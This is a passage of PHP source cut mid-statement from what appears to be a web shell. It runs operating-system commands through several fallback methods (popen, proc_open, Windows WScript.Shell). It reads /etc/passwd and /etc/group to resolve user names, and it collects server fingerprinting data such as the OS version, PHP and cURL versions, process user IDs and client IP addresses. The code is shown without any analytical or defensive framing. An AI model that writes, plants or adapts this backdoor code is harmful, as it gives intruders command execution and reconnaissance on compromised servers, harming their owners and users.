$r); if (is_array($r)) foreach ($r as $v) echo $v, "\n"; break; case 5: if ($h = popen($sc, 'r')) { while (!feof($h)) echo fread($h, 1024); pclose($h); } break; case 6: if($h = proc_open($sc,array(array('pipe','r'), array('pipe','w'), array('pipe','a')),$p)){ echo stream_get_contents($p[1]); fclose($p[0]); fclose($p[1]); proc_close($h); } break; case 7: if ($h = new COM('WScript.Shell')) echo $h->Exec(($sh === '' ? 'cmd' : $sh) . ' /C ' . $cmd . ' ' . $se)->StdOut->ReadAll(); break; case 101: echo safemode($cmd); } } function uName($id){ if($id === -1) return'?'; static $a = NULL, $f = FALSE; if($a === NULL){ if($v = getFile('/etc/passwd')){ $a = array(); $v = explode("\n", $v); foreach($v as $i) if($i){ $i = explode(':',$i,4); $a[$i[2]]=$i[0]; } } elseif(defined('POSIX_F_OK') || function_exists('posix_getpwuid')) $f = (bool)posix_getpwuid(0); } if($a) if(isset($a[$id])) return $a[$id]; elseif($f) if($v = posix_getpwuid($id)) return $v['name']; return $id; } function gName($id){ if($id === -1) return'?'; static $a = NULL, $f = FALSE; if($a === NULL){ if($v = getFile('/etc/group')){ $a = array(); $v = explode("\n",$v); foreach($v as$i) if($i){ $i = explode(':', $i, 4); $a[$i[2]] = $i[0]; } } elseif(defined('POSIX_F_OK') || function_exists('posix_getgrgid')) $f = (bool)posix_getgrgid(0); } if($a) if(isset($a[$id])) return $a[$id]; elseif($f) if($v = posix_getgrgid($id)) return $v['name']; return$id; } function getINI($s, &$v){ $v = trim(ini_get($s)); return $v!==''; } function isINI($v){ $v = strtolower(trim(ini_get($v))); return ($v === '1' || $v === 'on'); } function samePath($a){ $p = NULL; foreach($a as $v){ $v = array_slice(explode(DSC, rtrim($v,DSC)), 0, -1); if($p === NULL) $p = $v; else{ $k=array(); $c=count($p); $i=count($v); if($i < $c) $c=$i; for($i=0; $i < $c; ++$i) if($p[$i] === $v[$i]) $k[] = $p[$i]; else break; $p = $k; if($i===0) break; } } return count($p) === 0 ? '': implode(DSC, $p).DSC; } function escFileName($v){ return str_replace(array('%','/','\\',':','*','?','"','<','>','|'), array('%25',"\xe2\x95\xb1","\xe2\x95\xb2","\xea\x9e\x89","\xe2\x88\x97", '%3F', "\xe2\x80\x9f", '%3C', '%3E',"\xe2\x88\xa3"), $v); } function infMain($h = FALSE){ echo $h ? '<table id="tblInf"><tr title="HTTP Host, Server Addr, Server Name, Host Name, Host IP"><th>' : '[{"','Address', $h ? '</th><td>' : '":'; $a = array(); foreach(array('HTTP_HOST','SERVER_ADDR','SERVER_NAME') as $v) if(isset($_SERVER[$v])){ $v = trim($_SERVER[$v]); if($v!==''&&!in_array($v,$a))$a[]=$v; } if($v = php_uname('n')){ $v = trim($v); if($v !== '' && !in_array($v,$a)) $a[] = $v; } if(PHP_VERSION>='5.3' && ($v = gethostname())){ $v = trim($v); if($v !== '' && !in_array($v,$a)) $a[] = $v; } $r=''; foreach($a as $k => $v){ if($k > 0) $r.=' / '; $r .= $v; if($i=gethostbynamel($v)){ $b = FALSE; foreach($i as $v) if(!in_array($v, $a)){ $a[] = $v; if($b) $r .= ', '; else{$b = TRUE; $r .= ' (';} $r .= $v; } if($b) $r .= ')'; } elseif(($i = gethostbyname($v)) && !in_array($v, $a)){ $a[] = $v; $r .= ' ('.$v.')'; } } if($h) echo escHTML($r); else jsonEcho($r); echo $h ? '</td></tr><tr><th>' : ',"','System', $h ? '</th><td>' : '":'; $r = ''; if(($v = trim(php_uname('s').' '.php_uname('r').' '.php_uname('v').' '.php_uname('m'))) !== '') $r = $v; elseif(NIX && ($v = getFile('/proc/version'))) $r = $v; else{ if(defined('PHP_OS')) $r = PHP_OS; else $r = NIX ? '*NIX' : 'Windows'; if(!NIX){ $a = array(); foreach(array('PHP_WINDOWS_VERSION_MAJOR','PHP_WINDOWS_VERSION_MINOR','PHP_WINDOWS_VERSION_BUILD') as $v) if(defined($v)) $a[] = constant($v); if($a) $r .=' '.implode('.', $a); if(defined('PHP_WINDOWS_VERSION_SP_MAJOR') && PHP_WINDOWS_VERSION_SP_MAJOR > 0){ $r .= ' SP'.PHP_WINDOWS_VERSION_SP_MAJOR; if(defined('PHP_WINDOWS_VERSION_SP_MINOR') && PHP_WINDOWS_VERSION_SP_MINOR > 0) $r .= '.'.PHP_WINDOWS_VERSION_SP_MINOR; } } } if(NIX && (($v = trim(getFile('/etc/issue.net'))) !== '' || ($v = trim(getFile('/etc/issue'))) !== '')) $r .= ' ('.$v.')'; if($h) echo escHTML($r); else jsonEcho($r); if(!empty($_SERVER['SERVER_SOFTWARE'])){ echo $h ?'</td></tr><tr><th>' : ',"','Server', $h ? '</th><td>':'":'; if($h) echo escHTML($_SERVER['SERVER_SOFTWARE']); else jsonEcho($_SERVER['SERVER_SOFTWARE']); } echo $h ? '</td></tr><tr><th>' : ',"','Software', $h ? '</th><td>' : '":'; $r = 'PHP/'.PHP_VERSION; if(defined('SUHOSIN_PATCH_VERSION')) $r .= ' with Suhosin patch/'.SUHOSIN_PATCH_VERSION; $r .= '; '; if(defined('CURLE_OK')){ $r .= 'cURL'; $v = curl_version(); if(isset($v['version'])) $r.='/'.$v['version']; $r.='; '; } if($v = phpversion('Suhosin')) $r.=' Suhosin/'.$v; if($h) echo escHTML($r); else jsonEcho($r); echo $h ? '</td></tr><tr><th>' : ',"','User', $h ? '</th><td>' : '":'; $r=''; $a = array(); if(NIX){ if(defined('POSIX_F_OK') || function_exists('posix_geteuid')){ if(is_int($v = posix_geteuid())) $r .= 'euid='.$v.'('.uName($v).'); '; if(is_int($v = posix_getegid())) $r .= 'egid='.$v.'('.gName($v).'); '; } if(is_int($v = getmyuid())) $r .= 'ouid='.$v.'('.uName($v).'); '; if(is_int($v = getmygid())) $r .= 'ogid='.$v.'('.gName($v).'); '; } $b = FALSE; foreach(array('REMOTE_ADDR','HTTP_X_REAL_IP','HTTP_CLIENT_IP','HTTP_X_FORWARDED_FOR') as $i){ if(!empty($_SERVER[$i])){ if($b) $r.= ', '; else{ $b = TRUE; $r .= 'IP: '; } $r .= $_SERVER[$i]; } } if($b) $r .= ';'; if($h) echo escHTML($r); else jsonEcho($r); echo $h ? '</td></tr><tr><th colspan="2"></th></tr><tr><th>':'},{"','Safe mode',